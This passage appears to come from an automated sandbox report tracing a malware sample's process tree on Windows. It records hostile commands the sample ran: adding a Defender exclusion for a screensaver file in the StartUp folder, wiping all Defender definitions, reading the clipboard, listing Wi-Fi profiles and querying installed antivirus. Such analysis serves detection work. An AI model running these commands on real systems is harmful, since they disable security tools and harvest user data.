                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                            Start time:02:38:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                            Start time:02:38:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                            Start time:02:38:06
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                            Start time:02:38:06
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                            Start time:02:38:06
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff7e2d20000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff7e2d20000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                            Start time:02:38:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff7e2d20000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                            Start time:02:38:10
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                            Imagebase:0x7ff750e60000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                            Start time:02:38:10
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                            Start time:02:38:10
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                            Start time:02:38:10
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                            Start time:02:38:11
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                            Start time:02:38:11
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                            Start time:02:38:11
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                            Start time:02:38:11
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                            Start time:02:38:11
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff6a1c50000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                            Start time:02:38:11
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                                                                                            Imagebase:0x7ff69a2b0000
                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x910000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
